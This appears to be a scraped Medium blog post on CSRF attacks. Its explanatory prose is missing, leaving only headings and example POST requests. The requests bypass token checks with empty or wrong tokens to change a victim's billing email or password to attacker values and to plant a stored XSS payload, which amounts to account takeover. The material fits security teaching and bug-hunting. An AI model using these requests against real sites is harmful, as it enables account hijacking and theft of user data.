Attacking Sites Using CSRF

Critical CSRF #1: Leaking user information using CSRFPermalink

POST /change_billing_emailREQUEST BODY:
email=NEW_EMAIL &csrftok=12345
POST /change_billing_emailREQUEST BODY:
email=ATTACKER_EMAIL &csrftok=

Critical CSRF #2: Stored Self-XSS using CSRFPermalink

POST /change_account_nicknameREQUEST BODY:
nickname=<XSS PAYLOAD> &csrftok=WRONG_TOKEN
POST /change_account_nicknameREQUEST BODY:
nickname=<XSS PAYLOAD>

Critical CSRF #3: Taking over user accounts using CSRFPermalink

POST /password_changeREQUEST BODY:
oldpassword= &newpassword=XXXXX &csrftok=12345
POST /password_changeREQUEST BODY:
oldpassword= &newpassword=ATTACKER_PASS &csrftok=

ConclusionPermalink

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store